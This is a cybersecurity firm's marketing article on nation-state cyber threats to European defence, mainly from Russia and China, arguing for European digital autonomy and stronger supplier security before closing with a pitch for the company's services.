Door op ‘Alle cookies accepteren’ te klikken, gaat u akkoord met het opslaan van cookies op uw apparaat om de sitenavigatie te verbeteren, het sitegebruik te analyseren en te helpen bij onze marketinginspanningen. Bekijk ons privacyverklaring voor meer informatie.
VoorkeurenNeeAccepteer
Cybersecurity in the Defence Domain
March 25, 2025
READING TIME
4
MINUTen

Cyber security in the Defence Domain

Tactics, Threats, and the Urgency of European Autonomy

The war in Ukraine, rising tensions in the Baltic region, and instability along NATO and the EU’s eastern borders mark a period of structural unrest. Where attention was once focused primarily on physical threats, a clear shift has occurred: the digital battlefield has evolved into a fully-fledged operational domain within defence. Cyber warfare is no longer an extension of traditional military operations, it is now a core component.

The Active Cyber Landscape — China and Russia

Nation states, particularly Russia and China, are intensifying their digital operations against Europe and its allies. These activities go well beyond traditional espionage. They have become more structured, persistent, and technically sophisticated.

From Russia, we observe a mix of military GRU operations and civilian or semi-state hacktivist groups capable of launching destructive cyberattacks. Incidents such as the SolarWinds compromise, the notPetya attack, and recent targeted campaigns against NATO members illustrate both the capacity and willingness to cripple digital infrastructure.

China takes a more long-term strategic approach, focusing on intellectual property theft, influence over critical infrastructure, and establishing strategic network access. Campaigns like APT10, RedApollo (APT41), and more recently APT Volt Typhoon reveal how China consistently deploys cyber capabilities to gain geopolitical and economic influence.

Common Tactics of State Actors

Within the defence domain, nation-state tactics have become increasingly refined. Common techniques include:

  • Supply chain compromise: As seen in the SolarWinds incident, attackers abuse legitimate vendors to gain access to a wide range of targets
  • Living off the land (lotl): Using native tools and processes within the victim environment to avoid detection
  • Zero-day exploits: Leveraging previously unknown vulnerabilities to gain access or maintain persistence
  • Wiper malware: Destructive malware that renders systems permanently inoperable, such as notPetya or HermeticWiper
  • Psychological and information warfare: Merging cyberattacks with disinformation campaigns to destabilize public opinion, decision-making, and military command structures

The Case for European Autonomy

Europe’s dependency on non-European technologies and security standards presents a structural risk. Building an independent European knowledge base and operational capability is no longer optional, it’s urgent. This means investing in:

  • European cryptographic standards
  • Autonomous SOC and Threat Intelligence capabilities
  • Cross-border collaboration between defence, government, and private cybersecurity experts
  • Training and retaining cybersecurity professionals with domain expertise in defence and OT environments

Europe must move from consumer to creator, integrator, and innovator of cybersecurity solutions, ensuring digital sovereignty and strengthening the operational resilience of its defence domain.

The Role of Suppliers

Suppliers are vital to operational effectiveness in defence, yet they increasingly represent a vulnerable segment of the attack surface. In many supply chain attacks, smaller or less-secured vendors are the initial targets. A successful breach of such a supplier can escalate to compromise core Ministry of defence systems or affiliated units.

Thus, it is critical that all vendors and subcontractors within the defence ecosystem meet provably high security standards. This requires not only policy but also technical enforcement such as:

Our Experience in the defence Domain

At DeepBlue Security & Intelligence, we are actively involved in securing digital ecosystems within critical infrastructure and defence operations. Our team has in-depth knowledge and hands-on experience with detection engineering, response execution, forensic investigations, and hardening of hybrid IT/OT environments, which are typical for defence related networks.

Our approach combines technical depth, strategic insight, and independent advisory. We understand that in the defence sector, effective cyber resilience involves not only technical measures, but also policy and operational considerations.

So

Cyber warfare is not a future scenario, it is today’s reality. defence organizations must structurally strengthen their digital posture by combining tactical resilience with strategic autonomy. The persistent threats posed by Russia and China clearly demonstrate that the offensive capabilities of nation-states are real and recurring. To maintain control over the digital battlefield, Europe must invest in its own expertise, tools, and operational structures.

And suppliers cannot be overlooked, their resilience is a critical part of the bigger picture. DeepBlue is ready to be your independent, technically elite, and reliable partner in this mission.

www.deepbluesecurity.nl | info@deepbluesecurity.nl | +31 (0)70 800 2025

NEDERLANDSE VERSIE
Back to Resources

Ready to start?

When it comes to cyber security, we are your best choice

Contact